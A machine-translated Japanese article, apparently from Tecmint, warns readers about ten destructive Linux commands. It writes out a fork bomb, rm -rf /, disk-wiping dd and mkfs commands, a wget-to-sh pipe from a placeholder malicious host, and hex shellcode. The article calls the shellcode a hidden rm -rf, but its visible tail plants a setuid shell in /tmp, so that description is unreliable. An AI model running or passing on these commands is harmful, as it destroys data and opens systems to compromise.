10最も危険なコマンド-Linuxでは絶対に実行しないでください


Linuxコマンドラインは生産的で便利で興味深いものですが、何をしているのかわからない場合は特に危険な場合があります。この記事は、LinuxまたはLinuxコマンドラインに激怒することを意図したものではありません。コマンドを実行する前に、よく考えておく必要のあるコマンドのいくつかを知ってもらいたいだけです。

1. rm-rfコマンド

rm -rfコマンドは、フォルダーとその内容を削除する最も速い方法の1つです。ただし、少しのタイプミスや無知は、回復不能なシステム損傷を引き起こす可能性があります。 rmコマンドで使用されるオプションのいくつかは次のとおりです。

  1. rm command in Linux is used to delete files.
  2. rm -r command deletes the folder recursively, even the empty folder.
  3. rm -f command removes ‘Read only File’ without asking.
  4. rm -rf / : Force deletion of everything in root directory.
  5. rm -rf * : Force deletion of everything in current directory/working directory.
  6. rm -rf . : Force deletion of current folder and sub folders.

したがって、rm-rfコマンドを実行するときは注意してください。 「rm」コマンドによるファイルの誤った削除を克服するには、「。bashrc」ファイルに「rm-i」として「rm」コマンドのエイリアスを作成します。すべての削除を確認するように求められます。

2.:(){:|:&};:コマンド

上記は実際にはフォーク爆弾です。これは、「:」と呼ばれる関数を定義することによって動作します。この関数は、フォアグラウンドで1回、バックグラウンドで1回、合計2回呼び出します。システムがフリーズするまで、何度も何度も実行を続けます。

:(){:|:&};:

3.コマンド> / dev / sda

上記のコマンドは、「command」の出力をブロック/ dev/sdaに書き込みます。上記のコマンドは生データを書き込み、ブロック上のすべてのファイルが生データに置き換えられるため、ブロック上のデータが完全に失われます。

4.mvフォルダー/ dev / null

上記のコマンドは、「フォルダ」を/ dev/nullに移動します。 Linuxでは、/ dev/nullまたはnullデバイスは、書き込まれたすべてのデータを破棄し、書き込み操作が成功したことを報告する特別なファイルです。

# mv /home/user/* /dev/null

上記のコマンドは、ユーザーディレクトリのすべての内容を/ dev/nullに移動します。これは、文字通り、そこにあるすべてのものがブラックホール(null)に送信されたことを意味します。

5. wget http:// malicious_source -O- | sh

上記のコマンドは、悪意のあるソースからスクリプトをダウンロードして実行します。 Wgetコマンドはスクリプトをダウンロードし、shはダウンロードしたスクリプトを実行します。

注:パッケージとスクリプトをダウンロードするソースをよく知っておく必要があります。信頼できるソースからダウンロードされたスクリプト/アプリケーションのみを使用してください。

6. mkfs.ext3 / dev / sda

上記のコマンドはブロック「sda」をフォーマットします。上記のコマンドを実行すると、ブロック(ハードディスクドライブ)が新しくなり、真新しいことがわかります。データがないと、システムは回復不能な段階になります。

7.>ファイル

上記のコマンドは、ファイルの内容をフラッシュするために使用されます。上記のコマンドを「> xt.conf」のようなタイプミスまたは無知で実行すると、構成ファイルまたはその他のシステムまたは構成ファイルが書き込まれます。

8. ^ foo ^ bar

このコマンドは、「あまり知られていない10のLinuxコマンド」で説明されているように、コマンド全体を再入力することなく、前の実行コマンドを編集するために使用されます。ただし、^ foo ^ barコマンドを使用して元のコマンドの変更を徹底的にチェックするリスクを冒さなかった場合、これは非常に面倒な場合があります。

9. dd if u003d / dev / random of u003d / dev / sda

上記のコマンドは、ブロックsdaを消去し、ランダムなジャンクデータをブロックに書き込みます。もちろん!システムは一貫性がなく、回復不可能な段階のままになります。

10.コマンドを非表示にしました

以下のコマンドは、上記の最初のコマンド(rm -rf)に他なりません。ここでは、無知なユーザーがだまされる可能性があるように、コードは16進数で非表示になっています。ターミナルで以下のコードを実行すると、ルートパーティションが消去されます。

ここでのこのコマンドは、脅威が隠されていて、通常は検出できない場合があることを示しています。あなたは自分が何をしているのか、そして何が結果になるのかを知っている必要があります。不明なソースからのコードをコンパイル/実行しないでください。

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

注:Linuxターミナルやシェル、または友人や学校のコンピューターで上記のコマンドを実行しないでください。それらをテストする場合は、仮想マシンで実行します。上記のコマンドの実行による不整合やデータの損失は、システムを破壊します。記事の作成者もTecmintも責任を負いません。

それは今のところすべてです。私はあなたが読むのが大好きな別の興味深い記事ですぐにまたここにいます。それまでは、しばらくお待ちください。Tecmintに接続してください。そのような危険なLinuxコマンドを他に知っていて、リストに追加したい場合は、コメントセクションからお知らせください。貴重なフィードバックをお寄せください。